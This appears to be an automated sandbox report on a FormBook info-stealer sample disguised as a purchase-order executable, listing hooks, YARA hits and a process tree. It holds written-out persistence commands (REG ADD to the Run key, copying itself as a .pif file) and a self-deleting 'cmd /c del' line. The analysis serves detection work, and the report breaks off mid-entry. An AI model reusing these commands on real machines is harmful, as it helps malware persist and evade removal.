Oct 8, 2024 11:32:32.793823957 CEST	1236	IN	Data Raw: e7 de e6 e3 ea e8 e8 df e2 e5 14 e2 12 dd e2 2b 27 ce 29 d7 26 dc 2c d2 cd d6 d3 1d 1f 27 11 4c 3b 4a 39 37 fc 44 0a 4c 02 06 ff 03 2f 2d 04 f5 47 f6 f8 49 47 f1 f5 ed f0 f4 ef 42 fb f2 f2 d6 06 fa f7 05 1c e4 2a ec d3 1f 1d 1d 20 1d d3 1b 19 1b Data Ascii: +')&,'L;J97DL/-GIGB* ?JJECLE=@D;5:;:73131-1jlhfh^]c`YW[WMOTP~}wwzvqnnoY[QROOQOjjilccad_c^zut
Oct 8, 2024 11:32:32.799015045 CEST	1236	IN	Data Raw: 68 59 92 93 5e 91 93 8f 8d 94 92 c6 77 76 78 cb c9 c7 c1 c8 bf c6 71 72 cc bd 55 58 5c 59 ae 8a bb b9 bc b1 b8 b5 7f 82 af 7d 7d e9 1b 18 e6 e6 ec 15 eb e7 e8 e2 e6 e2 e0 0f df d5 da 2b 27 28 28 d1 d1 23 d4 d2 cf 1d d4 1d d4 3c 07 09 0c 0a 0b 3c Data Ascii: hY^wvxqrUX\Y}}+'((#<<54HK=B?)'#(*&,$JEJKA@CDA=9/6/3-gg``^`VPWVNSPT}yts\|tvVil

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x80 0x0E 0xE5
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x88 0x8E 0xE5
GetMessageW	INLINE	0x48 0x8B 0xB8 0x88 0x8E 0xE5
GetMessageA	INLINE	0x48 0x8B 0xB8 0x80 0x0E 0xE5

Target ID:	0
Start time:	05:30:02
Start date:	08/10/2024
Path:	C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe"
Imagebase:	0x440000
File size:	24'576 bytes
MD5 hash:	30ECD7046839AF0716977A9EF6047E60
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2176143982.000000000389A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2176143982.000000000389A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2176143982.000000000389A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2176143982.000000000389A000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2176143982.000000000389A000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2176143982.0000000003A5B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2176143982.0000000003A5B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2176143982.0000000003A5B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2176143982.0000000003A5B000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2176143982.0000000003A5B000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2176143982.00000000039CC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2176143982.00000000039CC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2176143982.00000000039CC000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2176143982.00000000039CC000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2176143982.00000000039CC000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:30:04
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif"
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:30:04
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:30:04
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif"
Imagebase:	0x970000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	05:30:06
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c Copy "C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe" "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif"
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:30:06
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	05:30:07
Start date:	08/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xf20000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	05:30:08
Start date:	08/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff609140000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.3387644205.000000000EB42000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3387644205.000000000EB42000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3387644205.000000000EB42000.00000040.00000001.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.3387644205.000000000EB42000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.3387644205.000000000EB42000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	05:30:11
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\cmstp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\cmstp.exe"
Imagebase:	0x220000
File size:	81'920 bytes
MD5 hash:	D7AABFAB5BEFD53BA3A27BD48F3CC675
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.3365508291.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3365508291.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3365508291.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.3365508291.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.3365508291.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.3366459232.0000000004520000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3366459232.0000000004520000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3366459232.0000000004520000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.3366459232.0000000004520000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.3366459232.0000000004520000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.3366396664.00000000044F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3366396664.00000000044F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3366396664.00000000044F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.3366396664.00000000044F0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.3366396664.00000000044F0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	05:30:14
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	05:30:14
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	05:30:16
Start date:	08/10/2024
Path:	C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif"
Imagebase:	0x210000
File size:	24'576 bytes
MD5 hash:	30ECD7046839AF0716977A9EF6047E60
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.2343571638.00000000039AB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2343571638.00000000039AB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2343571638.00000000039AB000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.2343571638.00000000039AB000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.2343571638.00000000039AB000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 61%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	05:30:19
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif"
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	05:30:19
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	05:30:19
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif"
Imagebase:	0x970000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	05:30:22
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c Copy "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif" "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif"
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	05:30:22
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	05:30:23
Start date:	08/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xd90000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	05:30:23
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\cmmon32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\cmmon32.exe"
Imagebase:	0x370000
File size:	36'352 bytes
MD5 hash:	DEC326E5B4D23503EA5176878DDDB683
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.2367170516.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.2367170516.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.2367170516.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.2367170516.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.2367170516.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	05:30:24
Start date:	08/10/2024
Path:	C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif"
Imagebase:	0x20000
File size:	24'576 bytes
MD5 hash:	30ECD7046839AF0716977A9EF6047E60
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.2411207031.000000000352B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.2411207031.000000000352B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.2411207031.000000000352B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.2411207031.000000000352B000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.2411207031.000000000352B000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	05:30:27
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif"
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	05:30:27
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	05:30:27
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif"
Imagebase:	0x970000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	05:30:29
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c Copy "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif" "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif"
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	05:30:29
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	05:30:30
Start date:	08/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x4e0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	05:30:30
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\msdt.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msdt.exe"
Imagebase:	0xe80000
File size:	389'632 bytes
MD5 hash:	BAA4458E429E7C906560FE4541ADFCFB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000002.2436330065.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001C.00000002.2436330065.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001C.00000002.2436330065.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000002.2436330065.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000002.2436330065.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	05:30:33
Start date:	08/10/2024
Path:	C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif"
Imagebase:	0x10000
File size:	24'576 bytes
MD5 hash:	30ECD7046839AF0716977A9EF6047E60
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.2500819565.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001D.00000002.2500819565.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001D.00000002.2500819565.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.2500819565.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.2500819565.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 61%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	05:30:36
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif"
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	05:30:36
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	05:30:36
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif"
Imagebase:	0x970000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	05:30:38
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c Copy "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif" "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif"
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
